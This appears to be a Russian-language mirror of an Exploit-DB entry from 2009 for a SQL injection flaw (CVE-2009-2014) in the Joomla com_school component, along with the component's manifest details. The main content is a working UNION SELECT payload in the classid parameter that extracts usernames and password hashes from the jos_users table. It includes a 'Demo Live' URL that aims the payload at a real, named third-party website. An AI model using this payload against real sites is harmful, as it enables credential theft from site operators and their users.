- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8891
- Проверка EDB
-
- Пройдено
- Автор
- CHIP D3 BI0S
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-2014
- Дата публикации
- 2009-06-08
Код:
----------------------------------------------------------------------
Joomla Component com_school (classid) SQL injection Vulnerability
----------------------------------------------------------------------
###################################################
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
###################################################
________________________________________________________
Example:
http://localHost/path/index.php?option=com_school&Itemid=null&func=showclass&classid=<sql Code>
<Sql Code>:
-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*
Demo Live:
http://www.mariadecervello.com/index.php?option=com_school&Itemid=null&func=showclass&classid=-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*
+++++++++++++++++++++++++++++++++
[!] Produced in South America
------------------------------------
<name>school</name>
<creationDate>18 July 2006</creationDate>
<author>Soner (pisdoktor) Ekici - Alex Chaparro</author>
<copyright>
This component in released under the GNU/GPL License
</copyright>
<authorEmail>damj3t@gmail.com</authorEmail>
<authorUrl>www.joomla.cl</authorUrl>
<version>1.4</version>
# milw0rm.com [2009-06-08]- Источник
- www.exploit-db.com
